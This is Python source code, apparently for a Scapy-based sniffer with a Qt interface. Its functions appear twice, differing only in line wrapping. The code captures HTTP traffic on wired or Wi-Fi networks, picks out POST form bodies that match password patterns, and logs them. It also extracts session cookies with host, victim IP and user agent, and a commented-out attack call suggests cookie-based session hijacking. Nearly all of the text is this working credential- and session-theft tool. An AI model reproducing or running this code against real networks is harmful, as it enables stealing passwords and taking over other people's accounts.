def ontothosepackets(self, pkt): if not IP in pkt: return if not TCP in pkt: return data = str(pkt['TCP'].payload) url = "/" try: if data.startswith("POST"): MonsterLogger.logger.error("post pkt!") juicyInfo = data[data.find("\r\n\r\n") + 4:] uri = data[4:data.find("\r\n")][:data.find("HTTP")].strip() elif data.startswith("GET"): juicyInfo = data[3:data.find("\r\n")][:data.find("HTTP" )].strip() uri = juicyInfo else: return except IndexError as e: # invalid pkt return host = self.extractheader(data, "Host") source = str(pkt['IP'].src) useragent = self.extractheader(data, "User-Agent") if self.extractPwd(juicyInfo): MonsterLogger.storeForm(useragent, host, uri, juicyInfo) if (len(data.split("Cookie")) < 1): return cookie = self.extractheader(data, "Cookie") MonsterLogger.storeCookie(useragent, host, uri, cookie) if Ether in pkt: ssid = "Ether" else: '''to save calculation time, just assume ssid is in first Dot11Elt <Dot11Elt ID=SSID len=14 info='MERCURY_xxxxx''' if Dot11Elt in pkt: ssid = pkt[Dot11Elt][0].info else: ssid = "Unknown" if host and cookie and self.my_ip != None: MonsterLogger.logger.critical("cookie found!") self.emit(SIGNAL("cookieFound"), (ssid, source, host), cookie, useragent) # self.model.addCookie(("ASUS",source,host), cookie) # self.attack(source, host, cookie, useragent) return
def ontothosepackets(self, pkt): if not IP in pkt: return if not TCP in pkt: return data = str(pkt['TCP'].payload) url = "/" try: if data.startswith("POST"): MonsterLogger.logger.error("post pkt!") juicyInfo = data[data.find("\r\n\r\n") + 4:] uri = data[4:data.find("\r\n")][:data.find("HTTP")].strip() elif data.startswith("GET"): juicyInfo = data[3:data.find( "\r\n")][:data.find("HTTP")].strip() uri = juicyInfo else: return except IndexError as e: # invalid pkt return host = self.extractheader(data, "Host") source = str(pkt['IP'].src) useragent = self.extractheader(data, "User-Agent") if self.extractPwd(juicyInfo): MonsterLogger.storeForm(useragent, host, uri, juicyInfo) if (len(data.split("Cookie")) < 1): return cookie = self.extractheader(data, "Cookie") MonsterLogger.storeCookie(useragent, host, uri, cookie) if Ether in pkt: ssid = "Ether" else: '''to save calculation time, just assume ssid is in first Dot11Elt <Dot11Elt ID=SSID len=14 info='MERCURY_xxxxx''' if Dot11Elt in pkt: ssid = pkt[Dot11Elt][0].info else: ssid = "Unknown" if host and cookie and self.my_ip != None: MonsterLogger.logger.critical("cookie found!") self.emit(SIGNAL("cookieFound"), ( ssid, source, host), cookie, useragent) # self.model.addCookie(("ASUS",source,host), cookie) # self.attack(source, host, cookie, useragent) return
def extractPwd(self, juicyInfo): MonsterLogger.logger.error("juicyInfo: " + juicyInfo) for pattern in self.patterns: matched = True MonsterLogger.logger.error("pattenr:" + str(pattern)) for item in pattern: if juicyInfo.find(item) == -1: matched = False break if matched: MonsterLogger.logger.critical("find pwd info!") MonsterLogger.logger.critical("matched mattern: " + str(pattern)) MonsterLogger.printJuicyForm(juicyInfo) return True
def extractPwd(self, juicyInfo): MonsterLogger.logger.error("juicyInfo: " + juicyInfo) for pattern in self.patterns: matched = True MonsterLogger.logger.error("pattenr:" + str(pattern)) for item in pattern: if juicyInfo.find(item) == -1: matched = False break if matched: MonsterLogger.logger.critical("find pwd info!") MonsterLogger.logger.critical( "matched mattern: " + str(pattern)) MonsterLogger.printJuicyForm(juicyInfo) return True
def incoming(self, infos, cookie, ua): self.model.addCookie(infos, cookie, ua) MonsterLogger.printJuicyCookie("ua: %s cookie %s host %s" % (ua, cookie, infos[2])) self.cookieWidget.expandAll()
def incoming(self, infos, cookie, ua): self.model.addCookie(infos, cookie, ua) MonsterLogger.printJuicyCookie( "ua: %s cookie %s host %s" % (ua, cookie, infos[2])) self.cookieWidget.expandAll()